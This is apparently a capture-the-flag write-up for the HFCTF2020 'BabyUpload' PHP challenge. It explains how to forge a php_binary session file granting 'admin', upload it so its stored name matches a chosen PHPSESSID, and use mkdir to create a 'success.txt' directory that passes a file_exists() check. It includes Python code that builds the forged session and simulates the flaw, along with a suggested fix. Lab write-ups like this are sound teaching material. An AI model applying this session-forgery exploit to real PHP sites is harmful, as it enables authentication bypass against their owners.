[hfctf2020]babyupload session parsing engine
2022-07-07 01:05:00 【-Gardenia blue-】
<?php
error_reporting(0);
session_save_path("/var/babyctf/"); // where session files are stored
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
        safe_delete($filename);
        die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}
$direction = filter_input(INPUT_POST, 'direction'); // filter_input() reads the POST variable direction
$attr = filter_input(INPUT_POST, 'attr'); // POST variable attr
$dir_path = "/var/babyctf/".$attr; // path concatenation: $dir_path = /var/babyctf/$attr
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username']; // $dir_path = /var/babyctf/private/$_SESSION['username']
}
if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){ // is_uploaded_file() checks that the file arrived via HTTP POST; the form field is up_file
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name']; // $file_path = /var/babyctf/$attr/<original file name>
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        // $file_path = /var/babyctf/$attr/<original file name>_<sha256 of the file contents>
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){ // rejects ../ and ..\ to block directory traversal
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE); // creates /var/babyctf/$attr/ recursively
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded"; // file stored at $file_path
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }
} elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename')); // file name from the POST variable filename; basename() strips any directory part
        $file_path = $dir_path."/".$filename; // $file_path = /var/babyctf/$attr/$filename
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){ // directory traversal check
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) { // does the path exist?
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"'); // strips the 65-character "_<sha256>" suffix from the download name
        if(readfile($file_path)){ // outputs the file contents
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }
    exit;
}
?>
Reading the code, the flag is returned when both of the following hold:
1. $_SESSION['username'] is exactly 'admin'
2. /var/babyctf/success.txt exists (file_exists() returns true)
Points gathered from the code review:
There are four inputs: the POST variables direction, attr and filename, and the uploaded file up_file.
1. direction=upload: file upload
The value of attr is concatenated into the path: $dir_path = "/var/babyctf/".$attr
In between there is a mkdir call, @mkdir($dir_path, 0700, TRUE), which creates that directory, so the directory we write into is chosen by the attr parameter.
The stored file name becomes
$file_path = /var/babyctf/$attr/<original file name>_<sha256 of the file contents>
That is, an underscore and the hex SHA-256 of the file are appended to the name we upload.
up_file is the uploaded file itself; a tool such as Postman can send the file we need.
2. direction=download: reading a file
filename selects the file. Since stored names are <name>_<sha256>, we can compute the name of any file we uploaded ourselves.
The path is $file_path = /var/babyctf/$attr/$filename
If the file exists, its contents are written to the response.
In PHP the default session file name is sess_<PHPSESSID>, so we can use download to look at our own session file first. attr can be left empty for this step, since it has nothing to do with what we are doing yet:
attr=&direction=download&filename=sess_609f6cd6a2922894f3843927cb598f65
The dumped file contains an invisible byte in front of username. Different session serialize handlers store the data differently:
php_binary: one byte holding the length of the key name, then the key name, then the value passed through serialize()
php: the key name, a vertical bar |, then the value passed through serialize()
php_serialize (PHP 5.5.4 and later): the whole $_SESSION array passed through serialize()
The leading length byte tells us this instance uses php_binary, so we forge a session file in that format:
<?php
ini_set('session.serialize_handler','php_binary'); // match the target's handler
session_save_path('D:\Phpstorm\file\[HFCTF2020]BabyUpload'); // local directory that receives the sess_<id> file
session_start();
$_SESSION['username'] = 'admin';
To make the later file-name calculation easy, rename the generated session file to just sess.
The content (an 0x08 byte, then usernames:5:"admin";) is not a formatting error: don't read it as "usernames"; it is the key name username followed by the serialized value, where s: marks a string.
Then use Postman to send the sess file in the up_file parameter (no need to build the multipart body by hand in Burp).
Remember to set the method to POST. I didn't change the method at first and a GET request returned nothing.
We can confirm the upload with the download request from before, but for that we first need the SHA-256 of the session file:
echo hash_file('sha256','D:\Phpstorm\file\[HFCTF2020]BabyUpload\sess');
//432b8b09e30c4a75986b719d1312b63a69f1b833ab602c9ad5f0299d1d76a5a4
So we just set filename to sess_432b8b09e30c4a75986b719d1312b63a69f1b833ab602c9ad5f0299d1d76a5a4 in the download request to confirm the file is there.
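The three handler layouts above and the file-name derivation, worked through in Python as an added example (this is not the writeup's code; the author generated the file with PHP). It encodes the same $_SESSION contents for each handler, parses a php_binary file back into key/value pairs, and derives the stored path /var/babyctf//sess_<sha256> and the PHPSESSID value from the blob. The digest 432b8b09... quoted above is the page's value for its own file; the script prints the digest of the 21-byte blob it builds, which is the same value only if the uploaded file is byte-for-byte identical (no trailing newline).

```python
import hashlib
import re


def php_serialize(value):
    """Subset of PHP serialize(): bool, int, str and arrays with string/int keys."""
    if isinstance(value, bool):
        return b"b:%d;" % int(value)
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        raw = value.encode()
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type %r" % type(value))


def encode_session(data, handler):
    """On-disk layout of a session file for the given session.serialize_handler."""
    items = [(k.encode(), php_serialize(v)) for k, v in data.items()]
    if handler == "php_binary":
        # chr(strlen(key)) . key . serialize(value) per entry; the length byte is the
        # "invisible character" seen when the file is dumped
        return b"".join(bytes([len(k)]) + k + v for k, v in items)
    if handler == "php":
        # key . "|" . serialize(value) per entry
        return b"".join(k + b"|" + v for k, v in items)
    if handler == "php_serialize":
        # the whole $_SESSION array through serialize()
        return php_serialize(data)
    raise ValueError("unknown handler %r" % handler)


def decode_php_binary(blob):
    """Parse a php_binary session file; string values only, enough for this challenge."""
    out, i = {}, 0
    while i < len(blob):
        klen = blob[i]
        key = blob[i + 1:i + 1 + klen].decode()
        i += 1 + klen
        m = re.match(rb's:(\d+):"', blob[i:])
        if not m:
            raise ValueError("unsupported value at offset %d" % i)
        n = int(m.group(1))
        start = i + m.end()
        out[key] = blob[start:start + n].decode()
        i = start + n + 2  # skip the closing quote and ';'
    return out


def saved_upload_path(attr, upload_name, content, root="/var/babyctf/"):
    """Where the challenge stores an upload: <root><attr>/<name>_<sha256 of content>."""
    digest = hashlib.sha256(content).hexdigest()
    return root + attr + "/" + upload_name + "_" + digest, digest


def forge_admin_session():
    """Admin session blob, the path it lands on, and the cookie that makes PHP load it.

    With attr empty and the upload named 'sess', the file is stored as
    /var/babyctf//sess_<sha256>, which is exactly where the files handler looks
    for PHPSESSID=<sha256> (save path + '/sess_' + id).
    """
    blob = encode_session({"username": "admin"}, "php_binary")
    path, digest = saved_upload_path("", "sess", blob)
    return {"blob": blob, "path": path, "PHPSESSID": digest}


if __name__ == "__main__":
    r = forge_admin_session()
    print(r["blob"])  # b'\x08usernames:5:"admin";'
    print("stored at:", r["path"])
    print("Cookie: PHPSESSID=" + r["PHPSESSID"])
```

The printed PHPSESSID is also the value to put after sess_ in the download check (attr=&direction=download&filename=sess_<digest>).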
The session file is now forged. What remains is to make success.txt exist. As analysed above, every upload gets _<sha256> appended to its name, so simply uploading a file called success.txt does not work.
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
        safe_delete($filename);
        die($flag);
    }
}
So look at what file_exists() accepts.
Directories! file_exists() returns true for a directory as well as a file. We can therefore use the attr parameter to create a directory named success.txt: upload the sess file once more with attr=success.txt, and @mkdir($dir_path, 0700, TRUE) creates /var/babyctf/success.txt/ on the way. The session file we uploaded earlier, /var/babyctf/sess_<sha256>, is untouched, and /var/babyctf/success.txt is now a path that exists.
bingo!!! Let's try it.
In the browser, change the PHPSESSID cookie to the SHA-256 computed earlier (432b8b09e30c4a75986b719d1312b63a69f1b833ab602c9ad5f0299d1d76a5a4). PHP then loads our forged session file and treats us as admin, and the response contains the flag. This only works because the default session.use_strict_mode=0 lets the server accept a session id it never issued and look for sess_<id> under session_save_path.
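To see why the gate passes, here is an added Python model (not the writeup's code) of the upload branch's path handling, run against a temporary directory that stands in for /var/babyctf/. os.path.exists() plays the role of PHP's file_exists() and, like it, is true for a directory; flag_gate_fixed() shows the is_file()-style check that would close the hole, which is my suggested fix rather than anything in the challenge.

```python
import hashlib
import os
import re
import tempfile

# same pattern as the challenge's preg_match('/(\.\.\/|\.\.\\\\)/', ...)
TRAVERSAL = re.compile(r"(\.\./|\.\.\\)")


def simulate_upload(root, attr, upload_name, content, username="guest"):
    """Mirror the upload branch: build dir_path, mkdir -p it, store <name>_<sha256>."""
    dir_path = root + attr                       # $dir_path = "/var/babyctf/".$attr
    if attr == "private":
        dir_path += "/" + username
    file_path = dir_path + "/" + upload_name + "_" + hashlib.sha256(content).hexdigest()
    if TRAVERSAL.search(file_path):
        raise ValueError("invalid file path")
    os.makedirs(dir_path, mode=0o700, exist_ok=True)   # @mkdir($dir_path, 0700, TRUE)
    with open(file_path, "wb") as f:                  # move_uploaded_file()
        f.write(content)
    return file_path


def flag_gate_vulnerable(root):
    """The challenge's gate: file_exists() is also true for a directory."""
    return os.path.exists(root + "success.txt")


def flag_gate_fixed(root):
    """Hardened gate (my change, not in the challenge): require a regular file."""
    return os.path.isfile(root + "success.txt")


def run_demo():
    root = tempfile.mkdtemp() + "/"          # stands in for /var/babyctf/
    blob = b'\x08usernames:5:"admin";'       # forged php_binary session (constructed)

    # 1) uploading a file called success.txt cannot create success.txt:
    #    the _<sha256> suffix is always appended
    p1 = simulate_upload(root, "", "success.txt", b"anything")

    # 2) attr=success.txt makes mkdir() create a *directory* with that name
    p2 = simulate_upload(root, "success.txt", "sess", blob)

    # 3) the traversal filter still rejects ../ in attr
    try:
        simulate_upload(root, "../", "sess", blob)
        traversal_blocked = False
    except ValueError:
        traversal_blocked = True

    return {
        "suffixed_name": os.path.basename(p1),
        "success_is_dir": os.path.isdir(root + "success.txt"),
        "vulnerable_gate": flag_gate_vulnerable(root),
        "fixed_gate": flag_gate_fixed(root),
        "session_copy_dir": os.path.basename(os.path.dirname(p2)),
        "traversal_blocked": traversal_blocked,
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, "=", v)
```

The second upload leaves a copy of the session file inside the new success.txt/ directory; that copy is irrelevant, since PHP only reads sess_<id> directly under the save path, which is why the first upload with attr empty has to be done as well.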